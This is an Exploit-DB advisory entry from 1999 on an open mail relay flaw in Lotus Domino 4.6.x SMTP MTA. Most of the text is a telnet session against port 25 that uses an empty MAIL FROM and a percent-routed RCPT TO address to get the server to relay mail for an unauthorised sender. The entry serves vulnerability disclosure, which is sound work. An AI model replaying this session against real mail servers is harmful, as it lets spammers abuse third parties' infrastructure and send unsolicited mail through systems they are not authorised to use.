Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA Mail Relay

EDB-ID:

19368

CVE:





Platform:

Multiple

Date:

1999-06-15


source: https://www.securityfocus.com/bid/487/info

Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server. 

telnet server 25
Connected to 192.168.1.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO sample.domain
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%remote.domain.net@company.com>
250 OK
DATA
From: ... etc

text of message

.
250 Message received OK.
quit
221 GoodBye